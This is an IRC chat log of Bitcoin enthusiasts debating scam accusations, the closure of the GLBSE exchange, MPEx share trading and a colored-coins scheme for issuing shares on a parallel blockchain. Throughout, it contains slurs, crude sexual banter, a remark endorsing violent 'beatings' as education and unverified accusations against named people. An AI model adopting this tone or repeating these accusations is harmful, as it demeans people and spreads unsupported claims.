Oct 15 23:42:27 it is scammibg Oct 15 23:42:35 It had to start with that specific string and be followed by a number... pretty harsh. Oct 15 23:42:57 I was only running at 11 megakey/s Oct 15 23:44:42 rdponticelli, who was it who refused to repay loan because that was not "theft" since bitcoins aren't "real money"? Oct 15 23:44:56 rdponticelli: IKR, and I discussed it in a non-binding fashion, outside of arbitration! How dare I?! Oct 15 23:46:05 and you loaned the money to an unlicensed illegal insurance company that sold unregistered securities! Oct 15 23:46:42 to a magical samurai rabbit boy girl person no less Oct 15 23:47:10 tbh, scam accusations are retarded Oct 15 23:47:18 NO U! Oct 15 23:47:26 dub depends. the girl's got theymos pretty talkative in short order. Oct 15 23:47:42 scam tags issued by a scammer are not useful Oct 15 23:47:52 the process is more useful than the result i guess. Oct 15 23:47:57 nor is bitcointalk.org in ngeneral Oct 15 23:48:01 dub: that's a good point Oct 15 23:48:52 i should just stoppit with the forum already Oct 15 23:49:34 smickles hire pr :D Oct 15 23:49:49 heh, got a good recomendation? Oct 15 23:49:51 [MPEX] [S.MPOE] 6181 @ 0.00040703 = 2.5159 BTC [-] Oct 15 23:49:52 [MPEX] [S.MPOE] 3719 @ 0.00040613 = 1.5104 BTC [-] Oct 15 23:49:56 notrly. Oct 15 23:49:58 maybe reeses Oct 15 23:50:02 lol Oct 15 23:50:23 (lol before reeses, i dunno reeses) Oct 15 23:50:32 you dunno reeses ?! Oct 15 23:50:51 i've heard of reeses, but not interacted with reeses much Oct 15 23:51:30 one of the few true girls on the interwebs. your loss. Oct 15 23:51:47 BTC-Mining: I don't know. I recall bulanula arguing that he can't return what was overpaid to him, because bitcoin transactions wasn't reversible Oct 15 23:51:59 the girl isnt a girl lol Oct 15 23:52:12 o ? Oct 15 23:52:24 that was a question Oct 15 23:52:33 i am typing with my thumbs at work Oct 15 23:52:50 i'm typing with one hand too, everytime thestringpuller talks Oct 15 23:53:38 huh pigeons ? Oct 15 23:53:52 are you masturbating? Oct 15 23:54:10 hold on Oct 15 23:54:20 say something else Oct 15 23:54:41 say "I'm your sister" Oct 15 23:55:13 I am your father Oct 15 23:55:15 i'm your sister as a teen Oct 15 23:55:26 oh copumpkin Oct 15 23:57:43 rdponticelli: bulanula was the first account I ignored, the final straw Oct 15 23:58:41 now im ruthless Oct 15 23:59:27 life is too short to even acknowledge people with so little worth Oct 16 00:04:20 dub: yeah, I just read lightly about the case Oct 16 00:04:36 Obviously it wasn't worthwhile Oct 16 00:05:49 But I found funny some arguments you can found around Oct 16 00:07:34 "it's not illegal b/c we didn't use fiat" Oct 16 00:07:34 lol Oct 16 00:07:53 Somebody should make a wiki Oct 16 00:08:03 encyclopediabitcoinica.com Oct 16 00:08:30 Well, somebody should make a page with the Scammer's arguments Oct 16 00:10:33 rdponticelli: http://www.encyclopediabitcoinica.com/wiki/Good_arguments Oct 16 00:10:59 rdponticelli: do you remember where that came from? I want to source it Oct 16 00:11:06 smickles: you're wiki :) Oct 16 00:11:37 No, I have no idea Oct 16 00:12:20 Don't forget: I can't give it back, b/c bitcoins transactions are irreversible Oct 16 00:12:22 it's not a scam if you use bitcoin Oct 16 00:13:05 lol Oct 16 00:13:06 http://www.encyclopediabitcoinica.com/wiki/GLBSE Oct 16 00:13:11 hahahaha Oct 16 00:13:54 BTC-Mining here : http://trilema.com/2012/the-crime-of-being-american/ you're famous now Oct 16 00:13:56 (again) Oct 16 00:14:45 wiki still getting spammed with new users Oct 16 00:14:57 http://www.encyclopediabitcoinica.com/wiki/Special:RecentChanges Oct 16 00:15:00 terrible. Oct 16 00:15:19 [MPEX] [S.MPOE] 3400 @ 0.00040613 = 1.3808 BTC [-] Oct 16 00:19:01 hmm my ignore of BTC-Mining doesn't work on mircea_popescu's website Oct 16 00:19:15 you're ignoring him ?! Oct 16 00:19:17 and Iraq is the 51st state Oct 16 00:19:32 nah, it ain't. had they the sense to make it a state it'd have actually been interesting. Oct 16 00:19:44 i imagine the russians muchly objected. Oct 16 00:20:22 pigeons you were the original source of trouble tho weren't you, with linking that blog. Oct 16 00:20:50 oh did I? I don't actually read the things i paste Oct 16 00:21:24 what blog is that from? Oct 16 00:21:56 linked right at beginning lol Oct 16 00:22:51 hmm, could have been me but probably not, i don't remember it. I like the comics a lot though Oct 16 00:23:49 [22:22] http://thecriminallawyer.tumblr.com/post/19810672629/12-i-was-entrapped :) Oct 16 00:23:49 That one is good too: http://thecriminallawyer.tumblr.com/post/29326904495/16-a-problems Oct 16 00:23:54 it was our good friend the pumpkin. Oct 16 00:24:10 the best one is the one with the pony in it Oct 16 00:24:11 yeah i knew i wasn't that clever Oct 16 00:24:18 cause the NY criminal lawyer is a brony Oct 16 00:26:17 I'm being spread on the interwebz!1!!1!!! Oct 16 00:26:38 Argh, I'm not butter! Oct 16 00:28:23 mircea, good you weren't here when azephur said he abandoned development because he doesn't wanted to go to jail Oct 16 00:28:54 jurov lol srsly ?! Oct 16 00:29:12 sadly Oct 16 00:29:25 He abandoned development of what exactly? Oct 16 00:29:31 i don't see an issue with going to jail b/c bitcoin. Oct 16 00:29:45 i'm much more worried about not pushing it hard enough. Oct 16 00:29:50 they hate us for our freedoms! Oct 16 00:29:59 he was diong something with mpex back in may, posted some screenshots Oct 16 00:30:12 jurov actually iirc he made a fully functional python script that most everyone uses. Oct 16 00:30:39 yes. but he wanted to make something with graphs iirc. Oct 16 00:30:45 $RandomStr, [url=http://theeliteporn.com/]qpmjnfejb[/url], $RandomStr, Oct 16 00:30:59 jesus blog comment spammers are getting more retarded by the month. Oct 16 00:31:03 ... how would that be illegal in the US? Oct 16 00:31:16 BTC-Mining right. lol. Oct 16 00:32:10 Oh, wait... I remember what they say: "Everyone in the US is a criminal since everything is illegal." Oct 16 00:33:39 coding Oct 16 00:33:56 why are project managers universally brain damaged Oct 16 00:34:30 Because people that are not brain damaged are needed to do actual work. Oct 16 00:34:42 actually... i'm a project manager. Oct 16 00:35:07 the thing is, project managers who aren't brain damaged have much better titles even if what they mostly do is manage projects Oct 16 00:35:10 That's why you put the smart one on a computer and the retard as the manager to whip the troop and be loud. Oct 16 00:35:14 mircea_popescu is brain damaged Oct 16 00:35:19 not sure it's a good counterexample Oct 16 00:35:26 the ones without no better title than pm are like the reserve nobody ever picks Oct 16 00:35:43 copumpkin im not brain damaged, i'm brain damaging. world of difference :D Oct 16 00:35:48 oh, fair enough Oct 16 00:37:14 lmao jurov what bs in that chatlog. Oct 16 00:37:23 glbse was taking off ? in what paralel universe are we talking ? Oct 16 00:37:55 thing was going to shit, the fact that i killed them back in may finally landed in their thick skulls, quick grab for as much money as possible ensued as part of the unwinding procedures. Oct 16 00:38:02 has absolutely zero to do with any "laws". Oct 16 00:38:50 the amount of scammers, I'd probably be happier on the regulated one for most things << what are you, retarded ?! seriously now. Oct 16 00:39:00 glbse has a proven track record of scammer-promotion. Oct 16 00:39:03 mircea_popescu: scammers be everywhere Oct 16 00:39:06 glbse wasn't regulated Oct 16 00:39:14 that's bullshit. Oct 16 00:39:18 the thing existed to promote scams. Oct 16 00:39:34 wait. Did you just attribute yourself the closure of GLBSE? Oct 16 00:39:42 "33:56 thestringpuller | EskimoBob: lets take down Usagi rough shim up." - funny :) I think usagi is taking himself down at the moment. Maybe this is his exit "strategy" and he is going to announce how he feels insulted and leaves for good. A girlish exit lol Oct 16 00:39:47 perhaps but that's irrelephant to my statement Oct 16 00:39:52 i don't appreciate the misguided attempt to turn that scandal into some sort of "oh, it's what it is" Oct 16 00:40:15 BTC-Mining when you go from being the lone player in the market to struggling to keep your 20% share... Oct 16 00:40:37 ya, you can try 6 month's denial. and then ? Oct 16 00:41:41 [MPEX] [S.MPOE] 4200 @ 0.00040613 = 1.7057 BTC [-] Oct 16 00:42:48 mircea_popescu: I do not want to start any pissing contest here but whay do you think your exchange is any different than GLBSE (excluding the looks etc) Oct 16 00:43:02 it's secure. Oct 16 00:43:26 anything else? Oct 16 00:43:36 and you don't allow any random moron to issue a security Oct 16 00:43:50 it has a lot of volume. Oct 16 00:44:00 it actually lists securities as opposed to scams Oct 16 00:44:13 Apparently there are only 2 people that are not moron's in his book Oct 16 00:44:17 and on it goes, but i won't bother with all the many countless ways glbse was UNDER the minimum conceivable standard. Oct 16 00:44:25 and how is this "it's secure" makes the crapp issued there any less crappier than what GLBSE had listed? Oct 16 00:44:45 Doffx the problem is that most people who would be worthy to list do not want to get involved with what glbse + the forum have convinced them "investors" are Oct 16 00:44:52 ie, complete and utter idiots with no mony. Oct 16 00:45:06 i just morally won an reddit argument r/MPEx, hear me roar: http://www.reddit.com/r/Bitcoin/comments/11i5tz/trading_on_biggest_bitcoin_stock_exchange_now_easy/ Oct 16 00:45:07 EskimoBob have you bothered to read an actual contract there ? Oct 16 00:45:18 your laziness to inform yourself isn't really my responsibility you know. Oct 16 00:45:45 yes, thye are funny amateurish copy/paste legalese bull crap Oct 16 00:46:04 Obviously there was plenty of BTC. Oct 16 00:46:27 EskimoBob heh. Oct 16 00:46:29 As far as the investors go I dont really know how to answer that part. Oct 16 00:46:45 Doffx think about it for a second. you've made some nice business that actually makes sense, economically. Oct 16 00:46:53 mircea_popescu: heh? That's it? Heh? :) Oct 16 00:46:55 unlike the "i will pay you X from secret sources" a la obsi. Oct 16 00:47:10 Doffx now go read the thread where evoorhees announces s.dice, and see what those assholes have to say. Oct 16 00:47:13 dude, you and Nefario/Glbse gang are actually the same :) Oct 16 00:47:21 read the part where the girl explains to them they are fucking themselves over, and read their replies. Oct 16 00:47:32 just on looked a bit better Oct 16 00:47:34 why would the owner want to be involved with the collection of retards that glbse has collected ? Oct 16 00:47:58 So alienate everyone instead? Oct 16 00:48:09 EskimoBob you at some point have to come to terms with the harsh, cold reality that you calling something x or y has little power to make it be x or y. Oct 16 00:48:16 Doffx "everyone" Oct 16 00:48:42 people with 10 btc worth capital and 10k btc worth of bigmouth are NOT useful investors. Oct 16 00:48:48 mircea_popescu: calling everyone a retard is more like usagis line of defence or proof of some make believe shit Oct 16 00:48:59 EskimoBob "everyone" Oct 16 00:49:06 srsly, we need to stop with the everyone already. Oct 16 00:49:26 it's inadequate to imagine you can speak for "everyone" on the internets. Oct 16 00:49:34 OK, everyone was overstatement but lets say most Oct 16 00:49:38 EskimoBob can I pm you? Oct 16 00:49:43 I agree that’s a stupid argument. People want to have a voice, and if educated and or kept informed are usually easy to work with. Oct 16 00:49:50 Am I everyone? Oct 16 00:49:51 yes, i fully intend to allienate most self-declared investors on internet forums. Oct 16 00:49:52 and that cunt (you in a derss?) is really bad PR Oct 16 00:49:58 I think your just seeing a lot of fallout from Pirate, and now Glbse. Oct 16 00:49:59 i actually think it is irresponsible as a business practice not to. Oct 16 00:50:00 Angry people. Oct 16 00:50:15 sure you can PM me Oct 16 00:50:17 mircea_popescu: true true, I have a pm buddy that is currently contracted to a bank, as CIO Oct 16 00:50:17 Doffx this may well be very true. Oct 16 00:50:46 mircea_popescu: why not educate those retards a bit? Oct 16 00:50:53 EskimoBob i educate with a whip. Oct 16 00:51:00 LOL Oct 16 00:51:09 it works tho. Oct 16 00:51:16 not in the forum Oct 16 00:51:23 they start to cry and walk Oct 16 00:51:25 ok. Oct 16 00:51:28 nothing has changed Oct 16 00:51:31 then problem solved, they've selfselected. Oct 16 00:51:34 you lose Oct 16 00:51:39 haha what exactly do i lose ?! Oct 16 00:51:40 no, you lose Oct 16 00:51:49 this is like saying a college turning down applicants "loses" Oct 16 00:51:52 no, it gains. Oct 16 00:51:53 potential customers Oct 16 00:51:57 I told you dummies it was a scam is not very educating, " I told you so " In general usually just puts people off and shuts them down completely. Oct 16 00:51:58 they aren't either potential or customers. Oct 16 00:52:05 mircea_popescu: selection drives everything Oct 16 00:52:11 thestringpuller yup. Oct 16 00:52:19 You have a chance to make Mpex the best thing out there I just dont think it will happen. Oct 16 00:52:19 Doffx have you seen the girl's posts on the subject ? Oct 16 00:52:30 for instance, the cdo post which everyone shunned and then COPIED ? Oct 16 00:52:36 without even saying, hey, we learned this from X ? Oct 16 00:52:41 I have, I find her rude, and yes I know shes right it her tone. Oct 16 00:52:45 i think i win plenty. Oct 16 00:53:21 let's give out some links Oct 16 00:53:26 .g personal responsibility and the ponzi scam Oct 16 00:53:28 mircea_popescu: https://bitcointalk.org/index.php?topic=106391.0 Oct 16 00:53:36 I find her information useful at the same time she needs to tone it down. Oct 16 00:53:41 .g mpex cdo roll call Oct 16 00:53:42 mircea_popescu: https://bitcointalk.org/index.php?topic=76515.20 Oct 16 00:54:06 now compare the reaction to those two. do people whine about her tone ? surely. Oct 16 00:54:12 I'm not explaining that correctly, but she could really help people if she just went about it in a better way. Oct 16 00:54:13 do they submit, obey and learn ? sure they do. Oct 16 00:54:31 beatings, frequent and vicious, are the only right way to educate. Oct 16 00:54:53 there's no better way. Oct 16 00:55:12 jurov "polimedia is a forged domain" ?! wtf does that even mean ?! Oct 16 00:55:57 idk, just hat they insist it is registered on some restaurant address Oct 16 00:56:10 ... it means... the domain... was crafted by a blacksmith Oct 16 00:56:19 forged domain Oct 16 00:56:31 forged ftw Oct 16 00:56:43 http://www.reddit.com/r/Bitcoin/comments/11i5tz/trading_on_biggest_bitcoin_stock_exchange_now_easy/c6mvs1v someone could point out to him that well... s.dice is on coinbr / mpex lol Oct 16 00:57:12 amusing how superficial people are tho. Oct 16 00:57:26 i'm done with that discussion and fully satisfied. Oct 16 00:57:26 anyone else got an glbse email about an hour ago about restored funds w/o having received anything? kinda makes me wonder if I actually fucked up and gave a wrong btc address for the payout but it's too late to even see which address I put in -.- Oct 16 00:57:36 Why do people "invest" in SatoshiDice... Oct 16 00:57:44 and by invest, I mean bet, not get shares Oct 16 00:58:03 (if this makes anyone feel better, there were likely people who complained about the .us tld, because neustar sent an email, received proof they asked for, declared themsleves satisfied) Oct 16 00:58:19 darkee a lot of people have, and many were here reporting being paid. Oct 16 00:58:21 were you not ? Oct 16 00:58:32 BTC-Mining well... it's quick. Oct 16 00:58:35 not yet anyway, no :| Oct 16 00:58:50 how much did you have ? Oct 16 00:58:53 (order of magnitude) Oct 16 00:59:13 nothing significant, ~20 Oct 16 00:59:18 eh, many have but haven't been paid Oct 16 00:59:19 still would like to have them ;D Oct 16 00:59:20 that's an order of magnitude Oct 16 00:59:22 so 10^~20 Oct 16 00:59:29 which is a decent chunk o' change Oct 16 00:59:39 copumpkin evil Oct 16 00:59:54 nah it's ~20 real not power of anything, although 10^20 would be quite nice ^^ Oct 16 00:59:54 Guess I was lucky, was amongst the first to be paid and actually got paid. Oct 16 00:59:58 I am known for being the most evil pumpkin in the land Oct 16 01:00:06 darkee 20 is significant. some people never received anything but we put it down to rounding (which yes, is a horrible practice but what can you say) Oct 16 01:00:21 copumpkin: don't forget that you're a fed too Oct 16 01:00:23 20 is not a rounding error in any way tho Oct 16 01:00:29 oh yeah? Oct 16 01:00:34 indeed Oct 16 01:00:44 he's not a fed, he's a geek Oct 16 01:00:47 yea guess I'll wait and see until tomorrow, not like I can actually do anything about it for now anyway Oct 16 01:00:52 I'm thinking of maybe changing job Oct 16 01:00:54 mircea_popescu: a fedgeek :p Oct 16 01:01:08 fagdick ? Oct 16 01:01:15 close enough Oct 16 01:01:31 copumpkin: what you thinking of changing to? :p Oct 16 01:01:48 I was gonna become a janitor Oct 16 01:02:27 bbiab Oct 16 01:02:41 copumpkin are you one of those otakus that think the janitor always works in a teenage prison school for girls, mostly cleans underwear off the floor and ends up fucking the entire roster ? Oct 16 01:05:11 [MPEX] [S.MPOE] 4896 @ 0.00040845 = 1.9998 BTC [+] Oct 16 01:05:13 [MPEX] [S.MPOE] 53800 @ 0.00040954 = 22.0333 BTC [+] Oct 16 01:05:14 [MPEX] [S.MPOE] 14171 @ 0.0004097 = 5.8059 BTC [+] Oct 16 01:05:15 [MPEX] [S.MPOE] 20302 @ 0.00041016 = 8.3271 BTC [+] Oct 16 01:05:17 [MPEX] [S.MPOE] 41500 @ 0.00041038 = 17.0308 BTC [+] Oct 16 01:05:18 [MPEX] [S.MPOE] 51200 @ 0.0004133 = 21.161 BTC [+] Oct 16 01:05:19 [MPEX] [S.MPOE] 37164 @ 0.00041387 = 15.3811 BTC [+] Oct 16 01:05:19 [MPEX] [S.MPOE] 43735 @ 0.00041511 = 18.1548 BTC [+] Oct 16 01:05:20 [MPEX] [S.MPOE] 2675 @ 0.00041533 = 1.111 BTC [+] Oct 16 01:05:21 [MPEX] [S.MPOE] 24800 @ 0.0004165 = 10.3292 BTC [+] Oct 16 01:05:22 [MPEX] [S.MPOE] 2300 @ 0.00041693 = 0.9589 BTC [+] Oct 16 01:05:24 [MPEX] [S.MPOE] 12700 @ 0.00041704 = 5.2964 BTC [+] Oct 16 01:05:25 [MPEX] [S.MPOE] 12600 @ 0.0004171 = 5.2555 BTC [+] Oct 16 01:05:26 [MPEX] [S.MPOE] 42400 @ 0.00041713 = 17.6863 BTC [+] Oct 16 01:05:27 [MPEX] [S.MPOE] 58541 @ 0.0004183 = 24.4877 BTC [+] Oct 16 01:05:28 [MPEX] [S.MPOE] 51100 @ 0.00041887 = 21.4043 BTC [+] Oct 16 01:05:29 [MPEX] [S.MPOE] 17600 @ 0.00041934 = 7.3804 BTC [+] Oct 16 01:05:30 [MPEX] [S.MPOE] 1508516 @ 0.00042 = 633.5767 BTC [+] Oct 16 01:06:05 *dropped Oct 16 01:06:15 apparently i need to talk more about underwear. Oct 16 01:06:20 is that what you meant Doffx ? Oct 16 01:06:31 ? Oct 16 01:06:52 You have a chance to make Mpex the best thing out there I just dont think it will happen. << Oct 16 01:06:58 I dunno the links you provided me just proves my point, she turns people away. Oct 16 01:07:04 then, i talk about underwear, then 1.5mn shares sell Oct 16 01:07:15 I dont think it will happen and Ill be honest here. Oct 16 01:07:31 because she's not "nice" to people ? Oct 16 01:07:33 You and her turn people away with your personalities. Oct 16 01:07:50 listen, are you aware in the us people aren't even ALLOWED to invest unless they have millions in property ? Oct 16 01:07:54 Not because I dont think you have the best product. Oct 16 01:08:23 I invest, I dont have to invest in the bullshit markets to invest. Oct 16 01:08:35 what do you invest in ? Oct 16 01:08:39 Ill be sitting pretty soon as this bullshit falls apart, provided I survive it. Oct 16 01:09:06 I dont want to talk about what I Invest in. Oct 16 01:09:12 a ok. Oct 16 01:09:17 Bitcoin, investments sure. Oct 16 01:09:44 please at least enlighten us, which product is the best, then? Oct 16 01:09:48 now, the us implementation of many things is the pits, but most of the principles behind it are sound. Oct 16 01:10:01 I'm not attacking you either mircea_popescu because I listen to your advice when I find it valuable. Oct 16 01:10:04 the notion that you shouldn't allow absolutely anyone to "invest" is, imo, sound. Oct 16 01:10:46 You and the girl understand whats going on with all these complicated investment strats, I certainly dont get them. Oct 16 01:11:14 i guess it's also very impopular, given the very particular ethos of the bitcoin community, but something being impopular doesn't make it any less sound. Oct 16 01:11:20 hehe, czechoslovakia of 1990's with millions of shareholders comes to mind Oct 16 01:12:00 jurov or the great depression. you know that legend of the guy who overheard his domestics discussing share investments and decided to sell evertrthing ? Oct 16 01:12:37 no Oct 16 01:12:42 lemme dig for it. Oct 16 01:13:11 Joseph Kennedy, father of the late John. F. Kennedy, made the family’s fortune by selling off all his stocks right before the 1929 crash. The carefully crafted media tale, says that Kennedy decided to sell his stocks after overhearing shoeshine boys speculating on the stock market. Oct 16 01:13:12 the S.MPOE has a full 1 billion shares right? Oct 16 01:13:17 BTC-Mining yes Oct 16 01:13:29 eh, that's a lot of shares Oct 16 01:13:48 s.dice will eventually have 100mn Oct 16 01:14:03 (it already has, just 90mn of them are locked till ipo finishes) Oct 16 01:14:19 .5 cent each Oct 16 01:14:32 !ticker s.dice Oct 16 01:14:34 [MPEX:S.DICE] 1day: 0.0032 / 0.0033525 / 0.00337 (75800 shares, 254.12 BTC), 30day: 0.0001 / 0.00300231 / 0.0034 (2040952 shares, 6,127.58 BTC) Oct 16 01:14:37 ;;ticker Oct 16 01:14:38 Best bid: 11.86, Best ask: 11.8812, Bid-ask spread: 0.02120, Last trade: 11.85, 24 hour volume: 35604, 24 hour low: 11.43, 24 hour high: 12 Oct 16 01:14:47 .py 11.86 * 0.0033525 Oct 16 01:14:51 0.03976065 Oct 16 01:14:55 4 cent yeah Oct 16 01:15:00 omg penny market Oct 16 01:15:17 5 million valuation, earns ~10 - 25k per month Oct 16 01:15:18 the ex GLBSE asset 'RSM' is now going to use 'coloured coin' to prove ownership and pay dividends. We will look at helping shareholders issue there own assets on Open-Transaction servers valued against there coloured coins. We had enough investment for 180(GH/s) of ASIC's and will be saving 50% of profits towards buying more ASIC's. Oct 16 01:15:34 conceptually tho, i think shares should really work in 1k blocks. so you know, like 40 dollars for "traditional share" Oct 16 01:15:53 matthewh3 what's a colored coin ? Oct 16 01:16:03 The whole coloured coin and Open-Transaction thing seems like a mess. Oct 16 01:16:18 do they really mean black coin ?! Oct 16 01:16:52 How does one keeps track of their colored coins? One wallet for each? Oct 16 01:17:32 and transfer them to others? Oct 16 01:17:35 eh Oct 16 01:17:37 tho we are using this idea - https://bitcointalk.org/index.php?topic=117630.0 Oct 16 01:19:11 There are other approaches, and the one I have taken is very simple, but it is a working solution (primitively duct-taped and glued together). Oct 16 01:19:19 hm. this may not be such a good ideea with a live company Oct 16 01:19:22 if that's what rsm is Oct 16 01:19:38 I'd personally stay clear of any such option until there's convenient options for coloured coins. Oct 16 01:20:09 I mean, you have a BTC address tied to asset holders, just use that for communication Oct 16 01:20:21 People can sign requests with their current BTC address Oct 16 01:20:23 . It will be paid to the same address which is registered as the owner of the colored coins - but the receiver will need to be careful when spending the dividends, so it doesn't accidentally spend the transaction that represents the share. Oct 16 01:20:25 ow god. Oct 16 01:20:34 while this is in principle a good ideea, the implementation is awful. Oct 16 01:21:25 I can already see people accidentally spending them and people receiving random payments while holding said colored coins and being "wtf?" Oct 16 01:21:30 yup Oct 16 01:21:51 not only that, but here's a problem : if someone makes 1bn shares of something, this means 1bn satoshi are now out of circulation Oct 16 01:22:11 no the coloured coins are kept in there own blockchain.info/wallet and dividends go where you want Oct 16 01:22:13 I don't see that as a problem... Oct 16 01:22:15 tieing total float to total satoshi float is impossible.' Oct 16 01:22:50 then people can trade there ownership Oct 16 01:23:16 this means there will never be more than 21`000`000`0000`0000 shares in total, of everything. Oct 16 01:23:22 and you can't reuse the colored coins of dead assets. Oct 16 01:23:43 yes you can reuse coloured coins from dead assets Oct 16 01:23:46 this seems to me a huge problem. Oct 16 01:23:48 matthewh3 how ? Oct 16 01:24:10 read the threads I posted Oct 16 01:24:17 dude srsly. Oct 16 01:24:36 suppose PPT.A issued colored coins, that's some satoshis colored with PPT.A Oct 16 01:24:39 that is now defunct Oct 16 01:24:52 can i use those satoshis for my new company ? no, i can not, they have to be dead forever. Oct 16 01:25:06 Because if you have dead coins in your possession, you can retag them again for another company I guess. Oct 16 01:25:15 otherwise i inject shareholders into my new company that have no relation to it (provided they kept their original PPT.A colored coins) Oct 16 01:25:23 BTC-Mining ya but i mean... Oct 16 01:25:34 central stock exchanges defeat the very idea of bitcoin Oct 16 01:25:45 otherwise i inject shareholders into my new company that have no relation to it (provided they kept their original PPT.A colored coins) Oct 16 01:25:54 coloured coins and smart property are the future Oct 16 01:25:58 matthewh3 that's nonsense. bitcoin is bitcoin, not stock exchange. Oct 16 01:26:00 No, because you don't have the coins from all shareholders Oct 16 01:26:16 Just part of them and those get recolored. Oct 16 01:26:18 BTC-Mining i was just envisaging a sort of ICANN mess for satoshi-colored property. Oct 16 01:26:26 They basically overlap. Oct 16 01:26:48 But doesn't affect shareholders who kept colored coins of dead assets. Oct 16 01:26:50 BTC-Mining so then i could color some active companie's coins with my own colors, arbitrarily Oct 16 01:27:00 now a guy holding that double colored coin can't get rid of only one of the two Oct 16 01:27:13 Yes. Now the coins you colored have 2 colors. Oct 16 01:27:16 ouch. Oct 16 01:27:25 ok, this is a horrible idea. Oct 16 01:27:32 pleb Oct 16 01:27:51 dude you can't be creating medieval-style tokens of indivisible ownership Oct 16 01:28:00 Well, yeah. I find so too. Oct 16 01:28:21 goes against your Mpex maybe but coloured coins and smart property are the future of bitcoin Oct 16 01:28:33 how exactly does it go against my mpex ? Oct 16 01:28:34 Nah, it's a mess Oct 16 01:28:45 if i thought the idea has any merit i could go in and dominate the lot of you lol. Oct 16 01:28:46 I'm in favor of each company issuing their own centrally managed blockchain and leaving Bitcoins alone. Oct 16 01:28:57 BTC-Mining this may work, especially with merged mining Oct 16 01:29:00 *yawns Oct 16 01:29:17 tho it's quite the barrier to entry to new issuers, so there would be requirement for specialised issuers to service them Oct 16 01:29:27 and then those mgiht want to only run 1 chain for all the assets they manage Oct 16 01:29:45 (there's the problem of chainbloat, if you have 100 chains of 2gb each going on your hdd) Oct 16 01:31:00 once bitcoin market cap goes up the governments will be interested and central exchanges will be the first target. with coloured coins p2p exchanges are possible. Oct 16 01:31:04 [MPEX] [S.MPOE] 35581 @ 0.00040613 = 14.4505 BTC [-] Oct 16 01:31:05 [MPEX] [S.MPOE] 20419 @ 0.00040609 = 8.292 BTC [-] Oct 16 01:31:18 this may be a good point, but the problems are technical not political atm. Oct 16 01:31:51 there's any number of ways to implement a p2p exchange, this one's pretty much a hack. Oct 16 01:31:52 bah, best yet, have each issuer have their own 1 security exchange script and let people trade on it. Oct 16 01:32:07 If the exchange fails, no other security is affected. Oct 16 01:32:09 BTC-Mining the costs of maintaining this are non trivial. Oct 16 01:32:42 rather than put each egg on top of a traffic light, you might be better off putting all eggs in one basket and watching that basket. Oct 16 01:32:58 yeah Oct 16 01:33:51 Well colored coins could work if they were on their own blockchain and were not divisible (1 coin = 1 share) and not recolorable. Oct 16 01:34:12 You can then trade those coins for Bitcoins at whatever rate you wish. Oct 16 01:34:32 that's the basic idea 2nd part Oct 16 01:35:07 You could even use the same address. Like if you have 1 sharecoin on address xyz, dividends in bitcoins are sent to bitcoin address xyz Oct 16 01:35:44 that last point is particularly good. Oct 16 01:35:54 You just have two clients watching a different blockchain but using the same address. Oct 16 01:35:55 coloured coins can be traded at will p2p only at the moment the dividend address need changing manually on trading them. Oct 16 01:36:00 I'm assuming you don't mean a peer to peer BTC-to-USD exchange? (That'd be cool, though. Not sure how it'd work though.) Oct 16 01:36:13 no Oct 16 01:36:16 have a 2ndary chain, which a. can be mergedmined with btc ; b. uses identical addressspace to btc ; has infinite number of coins. Oct 16 01:36:27 yes Oct 16 01:36:30 cellofellow no, we discussing securities Oct 16 01:36:40 like stocks? Oct 16 01:36:43 yea Oct 16 01:36:48 nifty Oct 16 01:36:49 this is what this chan is about, hence -assets. Oct 16 01:36:56 ah Oct 16 01:37:02 BTC-Mining actually with a little help the main client could have a stocks tab Oct 16 01:37:02 that's what we need. I'm pretty sure the sharecoin concept was already proposed however. Oct 16 01:37:06 using coloured coins to prove ownership and pay dividends Oct 16 01:37:22 mircea_popescu: yeah Oct 16 01:37:30 o god i think i came a little. Oct 16 01:37:34 now THAT is the future. Oct 16 01:37:50 better get coding ;-) Oct 16 01:37:56 i'm no coder Oct 16 01:38:06 im a finance type Oct 16 01:38:18 then fincance a coder I guess :) Oct 16 01:38:27 lol now that might be an idea :D Oct 16 01:38:35 matthewh, no colored bitcoins. I don't like the idea of mixing bitcoins with shares. Oct 16 01:38:50 another blockchain using the same address space Oct 16 01:38:55 I've already put up a bounty for continued coloured coins development Oct 16 01:39:05 ah, where? Oct 16 01:39:06 cellofellow tbh this would be a huge effort, nothing for 1 person. we're still playing around the outskirts of specifying it yet anyway. Oct 16 01:39:28 BTC-Mining how would miners of 2nd chain be paid ? Oct 16 01:39:45 something like, 1 share of each type existant per block mined ? Oct 16 01:39:59 fixed btw ? Oct 16 01:40:01 btc* Oct 16 01:40:25 1 coder-size jobs don't usually need much funding, but bigger ones would need to be, so once your ideas are somewhat concrete, you know what to do I guess. Oct 16 01:42:22 then all we need is a p2p way to trade coloured coins for normal coin Oct 16 01:47:13 mircea_popescu... eh... would have to think about that. Oct 16 01:47:23 is the biggest hole i can see right now. Oct 16 01:47:51 maybe fixed btc payment per block could work, if the entire thing is administered by some sort of central authority like a professional association of the stock exchanges Oct 16 01:47:56 exept... now it's centralised again. Oct 16 01:48:20 to make it purely uncentralised would really require some hm Oct 16 01:48:24 I suppose the blockchain could support permanent tainting of coins by the current holders if signed by the holder's address Oct 16 01:48:41 as such, to issue shares, an asset manager would have to buy blank coins from a miner Oct 16 01:48:42 ya but how do you pay the miners ? Oct 16 01:48:48 which one lol Oct 16 01:48:55 o o o i see what you mean! Oct 16 01:48:59 hey, this is actually a good ideea. Oct 16 01:49:02 so miners get the blanks Oct 16 01:49:15 We just need to have this done... Oct 16 01:49:28 and there's no reward reduction, you just keep getting 1 bn new coins each block Oct 16 01:49:45 i think someone should run this by gavin and gang. Oct 16 01:49:50 hey Luke-Jr are you around a sec ? Oct 16 01:50:04 ? Oct 16 01:50:10 i wanna run an idea by you. Oct 16 01:50:35 so proposed is a paralel blockchain which can be mergedmined with btc and shares the same address space (ie, same key signatures as btc addresses) Oct 16 01:50:56 miners get 1bn coins per block mined, and coins are perma-tained. Oct 16 01:50:59 inb4 scamcoin Oct 16 01:51:13 this could work as a support for a p2p stocks accounting system Oct 16 01:51:26 whoever wants to issue shares has to buy the blanks from a miner that has them blank Oct 16 01:51:27 … Oct 16 01:51:33 there's no reward halving or anything. Oct 16 01:51:38 does this make any sense whatsoever ? Oct 16 01:51:42 no Oct 16 01:51:48 can you ellaborate ? Oct 16 01:52:09 TD and jgarzik are already working on some kind of smart property system within Bitcoin Oct 16 01:52:19 i know about that. Oct 16 01:52:23 that's what #bitcoin-dev is for Oct 16 01:52:24 <.< Oct 16 01:52:39 can you get a little over the procedural issues and just discuss on the merits ? Oct 16 01:52:54 Why does it has to use the Bitcoin blockchain? Oct 16 01:53:27 BTC-Mining: how else can you guarantee payment? 